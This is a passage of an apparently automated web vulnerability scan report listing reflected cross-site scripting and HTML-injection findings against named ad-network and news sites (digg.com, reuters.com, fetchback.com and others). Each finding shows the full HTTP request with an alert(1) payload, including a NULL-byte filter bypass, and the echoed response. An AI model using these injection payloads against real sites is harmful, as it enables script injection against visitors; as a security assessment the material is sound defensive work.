This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775&bd66c<a>6facc3e4125=1 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A11%3A17";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:11:17 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32474

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
s=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775&bd66c<a>6facc3e4125=1]]>
...[SNIP]...

5.43. http://control.adap.tv/control [pageUrl parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the pageUrl request parameter is copied into the HTML document as plain text between tags. The payload 8fd77<a>1cad7395e5e was submitted in the pageUrl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html8fd77<a>1cad7395e5e&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A08";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:08 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32524

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
ories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html8fd77<a>1cad7395e5e&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.44. http://control.adap.tv/control [sessionId parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the sessionId request parameter is copied into the HTML document as plain text between tags. The payload f2beb<a>113bbd59c6a was submitted in the sessionId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9f2beb<a>113bbd59c6a&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A20";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:20 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33182

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
h=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9f2beb<a>113bbd59c6a&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.45. http://control.adap.tv/control [width parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload d751d<a>d95b0125ac7 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300d751d<a>d95b0125ac7&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A48";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:48 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33240

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300d751d<a>d95b0125ac7&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&html
...[SNIP]...

5.46. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00669e1"><script>alert(1)</script>a84c496149e was submitted in the REST URL parameter 1. This input was echoed as 669e1"><script>alert(1)</script>a84c496149e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /submit%00669e1"><script>alert(1)</script>a84c496149e HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=1698788 10.2.128.119
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18218

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00669e1"><script>alert(1)</script>a84c496149e.rss">
...[SNIP]...

5.47. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dab5"-alert(1)-"03e4499d471 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=2dab5"-alert(1)-"03e4499d471 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 320

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=2dab5"-alert(1)-"03e4499d471' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.48. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bc35"-alert(1)-"27e7e245bd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=&2bc35"-alert(1)-"27e7e245bd2=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=&2bc35"-alert(1)-"27e7e245bd2=1' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.49. http://imp.fetchback.com/serve/fb/adtag.js [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43370"-alert(1)-"7ab0ee228a4 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=68283&type=lead43370"-alert(1)-"7ab0ee228a4&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 320

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead43370"-alert(1)-"7ab0ee228a4&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.50. http://jlinks.industrybrains.com/jsct [ct parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 659dc<script>alert(1)</script>9947f6192e1 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING659dc<script>alert(1)</script>9947f6192e1&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section REUTERS_INVESTING659dc<script>alert(1)</script>9947f6192e1

5.51. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a25e<script>alert(1)</script>42c1db7433c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp&3a25e<script>alert(1)</script>42c1db7433c=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 3a25e<script>alert(1)</script>42c1db7433c

5.52. http://jlinks.industrybrains.com/jsct [tr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 27fb8<script>alert(1)</script>88ae6a92ca4 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS27fb8<script>alert(1)</script>88ae6a92ca4&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 87

// Error: Site 851 has no section NEWS_MARKETS27fb8<script>alert(1)</script>88ae6a92ca4

5.53. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload a66a8<script>alert(1)</script>6d0d8b4836d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J06575a66a8<script>alert(1)</script>6d0d8b4836d HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 04 Sep 2011 00:42:21 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 05 Sep 2011 00:42:21 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:21 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J06575A66A8<SCRIPT>ALERT(1)</SCRIPT>6D0D8B4836D" was not recognized.
*/

5.54. http://js.www.reuters.com/recommend/re/re [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.www.reuters.com
Path:	/recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7ff1c%3balert(1)//79af3901163 was submitted in the callback parameter. This input was echoed as 7ff1c;alert(1)//79af3901163 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendations7ff1c%3balert(1)//79af3901163&ed=us&u=9da0587b-a65b-4bca-a7de-c321e48d355a&refreshUrlTimestamp=1315097078225 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:57:56 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:07:56 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Content-Length: 157

if (typeof Reuters.tns.updateRecommendations7ff1c;alert(1)//79af3901163 === 'function') {Reuters.tns.updateRecommendations7ff1c;alert(1)//79af3901163([]);}

